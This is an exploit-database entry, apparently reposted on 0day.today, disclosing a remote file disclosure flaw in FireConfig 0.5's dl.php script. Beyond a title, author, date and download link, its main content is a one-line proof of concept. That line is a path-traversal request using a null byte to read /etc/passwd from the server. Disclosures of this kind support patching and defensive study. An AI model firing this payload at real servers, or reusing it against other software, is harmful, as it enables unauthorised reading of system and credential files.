id: 2252
date: 10/27/2007
title: FireConfig 0.5 (dl.php file) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

=================================================================
FireConfig 0.5 (dl.php file) Remote File Disclosure Vulnerability
=================================================================



FireConfig v0.5 (dl.php file) Remote File Disclosure Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/fireconfig/fireconfig_v0.5.tar.gz
POC :
  /dl.php?file=../../../../../../etc/passwd%00



#  0day.today [2023-03-26]  #